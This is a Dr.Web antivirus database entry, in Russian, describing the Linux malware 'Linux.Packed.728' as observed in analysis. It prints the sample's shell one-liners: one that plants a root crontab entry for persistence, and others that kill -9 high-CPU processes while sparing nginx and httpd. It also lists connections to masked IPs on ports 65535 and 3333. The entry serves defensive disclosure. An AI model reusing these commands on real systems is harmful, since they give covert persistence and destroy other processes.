Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Linux.Packed.728
Добавлен в вирусную базу Dr.Web:
2020-02-25
Описание добавлено:
2020-02-25
Техническая информация
Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
/var/spool/cron/crontabs/root
Вредоносные функции:
Запускает себя в качестве демона
Запускает процессы:
sh -c ps -A -osta
ps -A -osta
awk /[zZ]/ && !a[$2]++ {print $2}
id -u
ps x
grep /etc/cron
grep -v grep
sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'nginx[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'nginx[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi
ps aux
grep -v -- nginx[[:space:]]*$
grep -v /usr/sbin/httpd
awk {if($3>30.0) print $2}
sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '<SAMPLE_FULL_PATH>' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'<SAMPLE_FULL_PATH>' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '<SAMPLE_FULL_PATH>$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null
rm -rf /root/.cron
crontab -l
grep -v <SAMPLE_FULL_PATH>
grep <SAMPLE_FULL_PATH>$
sort
wc -l
uniq
crontab /root/.cron
sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'nginx[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'nginx[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'nginx[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'nginx[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi
grep -- nginx[[:space:]]*$
Завершает следующие процессы:
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
/var/spool/cron/crontabs/tmp.98sU0R
Создает или модифицирует файлы:
/root/.cron
/var/spool/cron/.cron
/var/spool/cron/crontabs/tmp.98sU0R
/tmp/.lock
Удаляет файлы:
Сетевая активность:
Устанавливает соединение:
19#.###.127.168:65535
[2########:0:1010::1816:1001]:65535
19#.###.127.168:3333
DNS ASK:
Посылает данные следующим серверам:
Получает данные от следующих серверов:
Прочее:
Собирает информацию о CPU
Собирает информацию об оперативной памяти
Собирает информацию о сетевой активности
Рекомендации по лечению
Linux
Демо бесплатно
На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK